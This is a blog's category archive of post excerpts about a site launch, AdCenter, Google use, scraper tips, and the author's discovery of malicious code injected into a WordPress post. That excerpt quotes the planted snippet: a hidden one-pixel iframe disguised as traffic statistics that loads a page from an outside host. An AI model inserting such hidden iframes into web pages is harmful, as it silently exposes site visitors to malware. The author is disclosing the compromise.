Archive for the ‘SEM’ Category

Soft Launch of Fighters.com, Finally

It has been a long time in coming, but we’ve finally been able soft-launch Fighters.com. The site is pretty web-1.0 right now and most of the content is site->user, but that will change soon.
Check it out, let me know what you think. I know there will be bugs, but if you’re waiting to [...]

Nice Exploit Code I Found in my Wordpress

I was going through some old posts just now, and discovered this little treat embedded in a post:

<!– Traffic Statistics –>
<iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>
<!– End Traffic Statistics –>

The code that it’s loading (I know it doesn’t wrap, I don’t really care.) Code deleted. Thanks to Mike Peters for the follow-up in the [...]

AdCenter Still Sucks

I haven’t had an active campaign running in 6 months or more. FIX YOUR SHIT.

How much would you pay to use Google?

I got to thinking about how much I use Google to answer questions the other day. My search activity calendar looks like this every month:

Even between Jan 1-3 when I was in Vegas I did 1-3 searches. Some months are even more heavy than this. So how much would I pay? [...]

Tips on Writing a Scraper

A couple weeks ago I got an email from a friend asking for some tips on writing a scraper. As I was responding, I realized it would make a good post. I think writing scrapers is one of my specialties, and I’ve yet to come across a site I haven’t been able [...]